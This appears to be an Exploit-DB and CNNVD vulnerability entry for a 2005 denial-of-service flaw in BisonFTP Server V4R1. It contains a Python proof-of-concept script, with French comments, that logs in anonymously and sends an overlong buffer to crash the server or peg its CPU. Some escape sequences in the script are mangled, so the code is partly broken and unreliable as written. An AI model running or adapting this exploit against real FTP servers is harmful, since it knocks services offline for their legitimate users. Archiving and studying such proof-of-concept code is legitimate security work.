https://www.exploit-db.com/exploits/25911
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-226

BisonFTPServerV4R1中，远程认证用户可借助一个含有超长自变量的无效指令来触发拒绝服务攻击。

source: http://www.securityfocus.com/bid/14079/info

BisonFTP is prone to a remote denial-of-service vulnerability. A remote attacker may exploit this issue to deny service for legitimate users.

Reports indicate that the issue may be exploited only after successful authentication. 

#!/usr/bin/python
#
# Vulnerability: Denial Of Service
# Discovered on: June 26, 2005 by fRoGGz - SecuBox Labs
# When an invalid buffer size is sent to BisonFTPD -> DoS (100% CPU usage or crash)
# NB: Sorry for Python purists, it's the first time that i use it ;)

import socket
import time

n = 1
t = 98192 #Try others, it's funny.
p = 21 # Set your port here.
ip = "192.168.0.1" # Set ip here.
boom = "PoC "+'x41'*t

print "nnVulnerable product: BisonFTP Server V4R1"
print "Denial of Service vulnerability"
print "---------------------------------------------"
print "Discovered & coded by fRoGGz - SecuBox Labsn"

try:

    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    connect=s.connect((ip,p))

    d=s.recv(1024)

    print "[+] " +d

    print "[+] Utilisateur."

    time.sleep(1)

    s.send('USER Anonymousrn')

    s.recv(512)

    print "[+] Mot de passe."

    time.sleep(1)

    s.send('PASS Anonymousrn')

    s.recv(512)

    print "[+] Envoi malicieux.nnDoS termine !n"

    time.sleep(1)

    s.send(boom+'rnn')


except:

    print "[+] Machine indisponible, verifiez le port ou l'ip."

来源:BID
名称:14079
链接:http://www.securityfocus.com/bid/14079